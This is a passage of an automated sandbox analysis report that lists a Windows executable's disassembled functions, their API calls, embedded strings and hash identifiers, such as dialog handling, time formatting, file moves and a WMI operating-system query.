                    • GetWindowRect.USER32(?,?), ref: 00B6F6E9
                    • GetClientRect.USER32(?,?), ref: 00B6F6F5
                    • GetWindowLongW.USER32(?,000000F0), ref: 00B6F795
                    • GetWindowRect.USER32(?,?), ref: 00B6F7C2
                    • SetWindowTextW.USER32(?,?), ref: 00B6F7FB
                    • GetSystemMetrics.USER32(00000008), ref: 00B6F803
                    • GetWindow.USER32(?,00000005), ref: 00B6F80E
                    • GetWindowRect.USER32(00000000,?), ref: 00B6F83B
                    • GetWindow.USER32(00000000,00000002), ref: 00B6F8AD
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                    • String ID: $%s:$CAPTION$d
                    • API String ID: 2407758923-2512411981
                    • Opcode ID: b933f9a660fce322ea8067dfafaef825f0fbee1f736495d88f73605d7d71c548
                    • Instruction ID: 613d6532fdb79022923cb04311ffac85b709e4d9f904165a0ba5e12ddbbc6c6f
                    • Opcode Fuzzy Hash: b933f9a660fce322ea8067dfafaef825f0fbee1f736495d88f73605d7d71c548
                    • Instruction Fuzzy Hash: DF819072108301AFD710DFA8DD89F6BBBE9EB89704F04096DFA84E7290D674E805CB52
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 00B8DD26
                      • Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D8DE
                      • Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D8F0
                      • Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D902
                      • Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D914
                      • Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D926
                      • Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D938
                      • Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D94A
                      • Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D95C
                      • Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D96E
                      • Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D980
                      • Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D992
                      • Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D9A4
                      • Part of subcall function 00B8D8C1: _free.LIBCMT ref: 00B8D9B6
                    • _free.LIBCMT ref: 00B8DD1B
                      • Part of subcall function 00B8A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?), ref: 00B8A680
                      • Part of subcall function 00B8A66A: GetLastError.KERNEL32(?,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?,?), ref: 00B8A692
                    • _free.LIBCMT ref: 00B8DD3D
                    • _free.LIBCMT ref: 00B8DD52
                    • _free.LIBCMT ref: 00B8DD5D
                    • _free.LIBCMT ref: 00B8DD7F
                    • _free.LIBCMT ref: 00B8DD92
                    • _free.LIBCMT ref: 00B8DDA0
                    • _free.LIBCMT ref: 00B8DDAB
                    • _free.LIBCMT ref: 00B8DDE3
                    • _free.LIBCMT ref: 00B8DDEA
                    • _free.LIBCMT ref: 00B8DE07
                    • _free.LIBCMT ref: 00B8DE1F
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: 88d5d99eb6c229ab041ddb897f05e87133d64fb0031583a642d2f34dce6c8e79
                    • Instruction ID: 26fb4c0fd4e6e55764041d4784d2b4c94a4f50bb3973bc984813b93621fba471
                    • Opcode Fuzzy Hash: 88d5d99eb6c229ab041ddb897f05e87133d64fb0031583a642d2f34dce6c8e79
                    • Instruction Fuzzy Hash: 9C3117326043059FEB20BA38D845B5AB3E9FB11B11F1849ABE4499B1B1EF71AC80CB55
                    APIs
                      • Part of subcall function 00B612F6: GetDlgItem.USER32(00000000,00003021), ref: 00B6133A
                      • Part of subcall function 00B612F6: SetWindowTextW.USER32(00000000,00B945F4), ref: 00B61350
                    • EndDialog.USER32(?,00000001), ref: 00B7C800
                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00B7C827
                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B7C840
                    • SetWindowTextW.USER32(?,?), ref: 00B7C851
                    • GetDlgItem.USER32(?,00000065), ref: 00B7C85A
                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B7C86E
                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B7C884
                    • SetForegroundWindow.USER32(?), ref: 00B7C88B
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: MessageSend$ItemWindow$Text$DialogForeground
                    • String ID: LICENSEDLG
                    • API String ID: 3249366922-2177901306
                    • Opcode ID: 45da1986a36e09798d246b621b7399a0c8c7342f6c2c0b7cf43eec69e437b616
                    • Instruction ID: 4774b58531ae3868439b93125502a4b91061e24f64fc476acaa194343ab90b53
                    • Opcode Fuzzy Hash: 45da1986a36e09798d246b621b7399a0c8c7342f6c2c0b7cf43eec69e437b616
                    • Instruction Fuzzy Hash: 8621A0322402007BD2215F29EC89F3B3FECEB4AB85F04849CF654B70A1CF62A9419632
                    APIs
                    • GetWindow.USER32(?,00000005), ref: 00B7E811
                    • GetClassNameW.USER32(00000000,?,00000800), ref: 00B7E83D
                      • Part of subcall function 00B73316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00B6D523,00000000,.exe,?,?,00000800,?,?,?,00B79E5C), ref: 00B7332C
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00B7E859
                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B7E870
                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00B7E884
                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B7E8AD
                    • DeleteObject.GDI32(00000000), ref: 00B7E8B4
                    • GetWindow.USER32(00000000,00000002), ref: 00B7E8BD
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                    • String ID: STATIC
                    • API String ID: 3820355801-1882779555
                    • Opcode ID: b75da5f6bcc55a163cd4683ed18e54eaf90d32741b3e3fa917ea9545ff819398
                    • Instruction ID: a61f47c6551bca56c286c3faf9ff5cc9e320f49ea6276568bcc6e006f4b08cf4
                    • Opcode Fuzzy Hash: b75da5f6bcc55a163cd4683ed18e54eaf90d32741b3e3fa917ea9545ff819398
                    • Instruction Fuzzy Hash: F9110232100A107BE3316B609C4EFAF36ECEF1C710F0481B0FA39A6092CF64D94556B6
                    APIs
                    • _free.LIBCMT ref: 00B8A435
                      • Part of subcall function 00B8A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?), ref: 00B8A680
                      • Part of subcall function 00B8A66A: GetLastError.KERNEL32(?,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?,?), ref: 00B8A692
                    • _free.LIBCMT ref: 00B8A441
                    • _free.LIBCMT ref: 00B8A44C
                    • _free.LIBCMT ref: 00B8A457
                    • _free.LIBCMT ref: 00B8A462
                    • _free.LIBCMT ref: 00B8A46D
                    • _free.LIBCMT ref: 00B8A478
                    • _free.LIBCMT ref: 00B8A483
                    • _free.LIBCMT ref: 00B8A48E
                    • _free.LIBCMT ref: 00B8A49C
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: b3539f7e26890c6eadca907414142e099b575408fd1ce387803475adbd68b6cb
                    • Instruction ID: 68f7f7463dc14b332d3fc29cce54132714726e66d604da7e4a2ac39c7bb16348
                    • Opcode Fuzzy Hash: b3539f7e26890c6eadca907414142e099b575408fd1ce387803475adbd68b6cb
                    • Instruction Fuzzy Hash: 5D11A476110108AFEB01FF94C852CDA3BF5EF15B50F4581A6FA088B236EA31EE51DB81
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 322700389-393685449
                    • Opcode ID: d547597a8604cd45b9cbd4546e44caf8441a8f55c69fca45b08072d22e89eee3
                    • Instruction ID: 55462e2de6a7097111c2101aed3bf1d64936a5a930cf069a1155cb6e7b653f47
                    • Opcode Fuzzy Hash: d547597a8604cd45b9cbd4546e44caf8441a8f55c69fca45b08072d22e89eee3
                    • Instruction Fuzzy Hash: E9B1577180020AEFCF25FFA4C8819AEBBF5FF14710B1545AAF8156B222D731EA51CB95
                    APIs
                    • _wcslen.LIBCMT ref: 00B7A6F6
                    • _wcslen.LIBCMT ref: 00B7A796
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00B7A7A5
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B7A7C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _wcslen$AllocByteCharGlobalMultiWide
                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                    • API String ID: 1116704506-4209811716
                    • Opcode ID: 6ab76028abe5e60de71f02d831cdc50cca36df1cadb0c9964cc0056893473c04
                    • Instruction ID: 261ef9df0ba1bc80325a4a6320d1ff7b3e3d9aa0967f4f3c025bca3ec99032d9
                    • Opcode Fuzzy Hash: 6ab76028abe5e60de71f02d831cdc50cca36df1cadb0c9964cc0056893473c04
                    • Instruction Fuzzy Hash: B73157321043017AE729BB609C46F6FBBE8EF91710F14809EF415A61E1EF649D0983A6
                    APIs
                    • _wcslen.LIBCMT ref: 00B6B5E2
                      • Part of subcall function 00B72701: GetSystemTime.KERNEL32(?), ref: 00B7270F
                      • Part of subcall function 00B72701: SystemTimeToFileTime.KERNEL32(?,?), ref: 00B7271D
                      • Part of subcall function 00B726AA: __aulldiv.LIBCMT ref: 00B726B3
                    • __aulldiv.LIBCMT ref: 00B6B60E
                    • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00B6B615
                    • _swprintf.LIBCMT ref: 00B6B640
                      • Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33
                    • _wcslen.LIBCMT ref: 00B6B64A
                    • _swprintf.LIBCMT ref: 00B6B6A0
                    • _wcslen.LIBCMT ref: 00B6B6AA
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                    • String ID: %u.%03u
                    • API String ID: 2956649372-1114938957
                    • Opcode ID: 5b604480fcef5eaf629119ba183743269ac4eef1c11192e7ec74a5df6faf480d
                    • Instruction ID: d182bca115162d3db05692a6167224bef14579ea22185770d49e48def6772c65
                    • Opcode Fuzzy Hash: 5b604480fcef5eaf629119ba183743269ac4eef1c11192e7ec74a5df6faf480d
                    • Instruction Fuzzy Hash: 322190B2A083006FD614EF65CC85DABB7ECEBD4710F0449AEF599D3251DB34DA0887A2
                    APIs
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7BC3F
                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B7BC50
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B7BC5E
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7BC6C
                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B7BC87
                    • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 00B7BCAE
                    • _swprintf.LIBCMT ref: 00B7BCD4
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                    • String ID: %s %s
                    • API String ID: 385609497-2939940506
                    • Opcode ID: 0bd5044e073a9e8a68171c0a4e96575450ee80ee3e1c2ccf48cbf06be78d976b
                    • Instruction ID: 48158dcf6a1658ee22c63d8dacd3a4c0386a5f58495876b052cff9d0fdaea7aa
                    • Opcode Fuzzy Hash: 0bd5044e073a9e8a68171c0a4e96575450ee80ee3e1c2ccf48cbf06be78d976b
                    • Instruction Fuzzy Hash: 6121C7B254115CABDB21DFA0ED45EEF3BACFF19304F144466FA15D2121EB20DA498B60
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00B6C43F,00B6C441,00000000,00000000,A8602748,00000001,00000000,00000000,00B6C32C,?,?,?,00B6C43F,ROOT\CIMV2), ref: 00B80F59
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00B6C43F,?,00000000,00000000,?,?,?,?,?,00B6C43F), ref: 00B80FD4
                    • SysAllocString.OLEAUT32(00000000), ref: 00B80FDF
                    • _com_issue_error.COMSUPP ref: 00B81008
                    • _com_issue_error.COMSUPP ref: 00B81012
                    • GetLastError.KERNEL32(80070057,A8602748,00000001,00000000,00000000,00B6C32C,?,?,?,00B6C43F,ROOT\CIMV2), ref: 00B81017
                    • _com_issue_error.COMSUPP ref: 00B8102A
                    • GetLastError.KERNEL32(00000000,?,00B6C43F,ROOT\CIMV2), ref: 00B81040
                    • _com_issue_error.COMSUPP ref: 00B81053
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                    • String ID:
                    • API String ID: 1353541977-0
                    • Opcode ID: 1226c1db92a5187625655c4d464ee05a6263774d9fe52d52d8d1d0c0ce207b41
                    • Instruction ID: 659e72ff077a530e2ea6530be4790f684f0516a49f1a61b326456bf78d78b6f5
                    • Opcode Fuzzy Hash: 1226c1db92a5187625655c4d464ee05a6263774d9fe52d52d8d1d0c0ce207b41
                    • Instruction Fuzzy Hash: 6C411971A10215AFCB10BF68DC45FAFBBE8EF08750F1086AAF505E7260DB35A845C7A4
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                    • API String ID: 3519838083-3505469590
                    • Opcode ID: 62a20c7019b9e1fd3488bf271c94efedc68f6dd60186934e0ef5461afc9ccab7
                    • Instruction ID: 1273bc67fc7b32660978e75dc9f07263d063df3b69f0854f9ff77b3db09c88b2
                    • Opcode Fuzzy Hash: 62a20c7019b9e1fd3488bf271c94efedc68f6dd60186934e0ef5461afc9ccab7
                    • Instruction Fuzzy Hash: 0A711A71A00219AFDF14DFA4CC95DBEBBF9FF88710B144599E556A72A0CB34AD02CB60
                    APIs
                    • __EH_prolog.LIBCMT ref: 00B6A5EE
                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B6A611
                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00B6A630
                      • Part of subcall function 00B6D6A7: _wcslen.LIBCMT ref: 00B6D6AF
                      • Part of subcall function 00B73316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00B6D523,00000000,.exe,?,?,00000800,?,?,?,00B79E5C), ref: 00B7332C
                    • _swprintf.LIBCMT ref: 00B6A6CC
                      • Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33
                    • MoveFileW.KERNEL32(?,?), ref: 00B6A73B
                    • MoveFileW.KERNEL32(?,?), ref: 00B6A77B
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                    • String ID: rtmp%d
                    • API String ID: 3726343395-3303766350
                    • Opcode ID: c3b282efe6c4475ae166e247aea1325e90b8650f6588cf1c4b4ce1f7abe0f074
                    • Instruction ID: fdfbfe181efc41d533a46f09d565e72bea9399a756a4f4f852fe1a191d3543fb
                    • Opcode Fuzzy Hash: c3b282efe6c4475ae166e247aea1325e90b8650f6588cf1c4b4ce1f7abe0f074
                    • Instruction Fuzzy Hash: AE412B719005696ACF20ABA0CC85EEF73FCEF45340F0404E5B659B3046EB389E859F65
                    APIs
                    • __aulldiv.LIBCMT ref: 00B7254E
                      • Part of subcall function 00B6C619: GetVersionExW.KERNEL32(?), ref: 00B6C63E
                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00B72571
                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00B72583
                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B72594
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B725A4
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B725B4
                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00B725EF
                    • __aullrem.LIBCMT ref: 00B72699
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                    • String ID:
                    • API String ID: 1247370737-0
                    • Opcode ID: 4d07d7fc0ea39855447d6d56228c74a6f896bd76404ea22f5d01a67f1ca07bd6
                    • Instruction ID: 28900dd417535f77f90c8a871a10810e2a68c0d65bbf81fb71ce67091b42f1ce
                    • Opcode Fuzzy Hash: 4d07d7fc0ea39855447d6d56228c74a6f896bd76404ea22f5d01a67f1ca07bd6
                    • Instruction Fuzzy Hash: E84106B25083059FC710DF65C88496BBBE9FB98314F10892EF59AD3210E735E549CB62
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
